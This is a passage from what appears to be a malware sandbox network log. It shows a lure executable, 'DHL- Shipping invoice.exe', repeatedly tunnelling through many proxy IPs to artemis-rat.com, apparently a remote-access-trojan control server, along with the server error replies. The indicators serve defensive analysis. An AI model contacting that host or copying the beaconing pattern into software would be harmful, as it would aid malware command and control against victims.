                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.320580959 CET343INHTTP/1.1 400 Bad Request
                            Server: nginx/1.14.0 (Ubuntu)
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Content-Type: text/html
                            Content-Length: 182
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1601192.168.2.454804172.67.182.3806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.145694971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.232980013 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1602192.168.2.454808104.18.136.28806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.145823956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.233158112 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1603192.168.2.45009123.225.72.12235006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.146348000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.250103951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.250193119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:18.265669107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1604192.168.2.45011623.225.72.12335016484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.146454096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.250044107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.250190973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:18.265691996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1605192.168.2.454832104.25.108.120806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.147672892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.234994888 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1606192.168.2.454142162.214.121.173335726484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.149985075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.250050068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.250193119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1607192.168.2.454848203.32.121.157806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.150450945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.238231897 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1608192.168.2.454660103.118.46.6180806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.150605917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1609192.168.2.453028203.99.57.14556786484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.151011944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.239947081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.250349045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:18.362260103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1610192.168.2.4547473.123.150.19231286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.151272058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.324388027 CET116INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Server: nginx
                            Content-Type: text/plain
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1611192.168.2.454662221.153.92.39806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.153887987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1612192.168.2.454707188.166.17.1888816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.156563044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1613192.168.2.454738185.219.133.10631286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.158148050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.363089085 CET327INHTTP/1.1 400 Bad Request
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Content-Type: text/html
                            Content-Length: 166
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1614192.168.2.454736185.104.112.62806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.162632942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.374047041 CET799INHTTP/1.1 500 Internal Server Error
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Server: Apache/2.4.56 (Debian)
                            Content-Length: 607
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 71 73 68 6e 40 6d 61 69 6c 2e 72 75 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at qshn@mail.ru to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.56 (Debian) Server at artemis-rat.com Port 443</address></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1615192.168.2.450117213.247.209.18531286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.163095951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.250117064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.250238895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:18.265718937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1616192.168.2.454641211.95.135.11631286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.168664932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1617192.168.2.45477746.232.248.164806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.169265032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.343564034 CET327INHTTP/1.1 400 Bad Request
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Content-Type: text/html
                            Content-Length: 166
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1618192.168.2.45493043.134.167.514436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.193610907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1619192.168.2.45493643.134.167.514436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.194297075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1620192.168.2.45493454.38.187.1774436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.194464922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1621192.168.2.45493954.38.187.1774436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.195847034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1622192.168.2.45479165.21.255.19731286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.197463036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.385833979 CET75INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Content-Length: 0
                            Mar 12, 2024 08:37:06.574666023 CET103INHTTP/1.1 400 Bad Request
                            Content-Type: text/plain; charset=utf-8
                            Connection: close
                            Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                            Data Ascii: 400 Bad Request


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1623192.168.2.45495643.134.167.514436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.198771954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1624192.168.2.45495854.38.187.1774436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
